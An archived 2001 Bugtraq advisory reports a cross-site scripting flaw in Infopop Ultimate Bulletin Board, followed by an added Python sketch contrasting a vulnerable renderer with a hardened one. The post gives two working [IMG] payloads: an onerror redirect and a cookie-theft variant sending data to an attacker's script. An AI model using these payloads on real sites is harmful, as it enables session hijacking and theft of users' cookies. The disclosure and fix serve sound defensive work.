[23155] in bugtraq


UBB vulnerabilities + about: using example

daemon@ATHENA.MIT.EDU (kyprizel)
Thu Nov 15 17:02:27 2001

Date: Fri, 16 Nov 2001 02:10:50 +0700
From: kyprizel <kyprizel@hostel.tusur.ru>
Reply-To: kyprizel <kyprizel@hostel.tusur.ru>
Message-ID: <15722392656.20011116021050@hostel.tusur.ru>
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 8bit

Hello, dear bugtraq,
  Posting something like this UBB tag:
  [IMG]http://about:test"onerror="top.location.href='http://punk.tomsk.ru';[/IMG]
  to Infopop Ultimate Bulletin
  Board, we are able to redirect the user's browser to http://punk.tomsk.ru
  There are many ways to steal cookies using this vulnerability, one
  of them:
  [IMG]http://about:test"onerror="this.src='http://somedomain.com/yourscript.php';[/IMG]
   and yourscript.php is a script to receive users' cookies 8)
  
  


  --
 // Э.Заитов AKA kyprizel                        mailto:kyprizel@hostel.tusur.ru
                                                 ICQ#3337333
  --
 "Knowledge itself is power..."
  F.Bacon
  --
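
Added example, not part of the original post and not Infopop's code: a sketch of why the [IMG] tag above breaks out of the src attribute, next to a hardened renderer that rejects it. `render_naive` is an assumed reconstruction of the vulnerable pattern (tag body copied unescaped into a double-quoted attribute); all function names are hypothetical.

```python
import html
import re
from urllib.parse import urlsplit

IMG_TAG = re.compile(r"\[IMG\](.*?)\[/IMG\]", re.IGNORECASE | re.DOTALL)

# First tag from the post above, used as the test input.
SAMPLE = "[IMG]http://about:test\"onerror=\"top.location.href='http://punk.tomsk.ru';[/IMG]"

def render_naive(post: str) -> str:
    """Assumed vulnerable pattern: tag body copied into src="..." unescaped."""
    return IMG_TAG.sub(lambda m: '<img src="%s">' % m.group(1), post)

def safe_img_url(url: str) -> bool:
    """Allow only absolute http(s) URLs with a host, a numeric port (if any),
    and no characters that could end the attribute or the tag."""
    if re.search(r"[\s\"'<>`\\]", url) or any(ord(c) < 0x20 for c in url):
        return False
    try:
        parts = urlsplit(url)
        parts.port  # raises ValueError for a non-numeric port ("about:test")
    except ValueError:
        return False
    return parts.scheme in ("http", "https") and bool(parts.hostname)

def render_hardened(post: str) -> str:
    """Escape all text; emit <img> only for URLs that pass safe_img_url()."""
    out, pos = [], 0
    for m in IMG_TAG.finditer(post):
        out.append(html.escape(post[pos:m.start()]))
        url = m.group(1).strip()
        if safe_img_url(url):
            out.append('<img src="%s" alt="">' % html.escape(url, quote=True))
        else:
            out.append(html.escape(m.group(0)))  # show the rejected tag as text
        pos = m.end()
    out.append(html.escape(post[pos:]))
    return "".join(out)

if __name__ == "__main__":
    print(render_naive(SAMPLE))     # onerror lands outside the src attribute
    print(render_hardened(SAMPLE))  # tag is shown as inert, escaped text
    print(render_hardened("[IMG]http://example.com/a.png[/IMG]"))
```

The hardened path applies two independent controls: an allow-list on the URL (scheme, host, port, forbidden characters) and HTML-escaping of everything written into the page, so a gap in one does not reopen the attribute injection.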

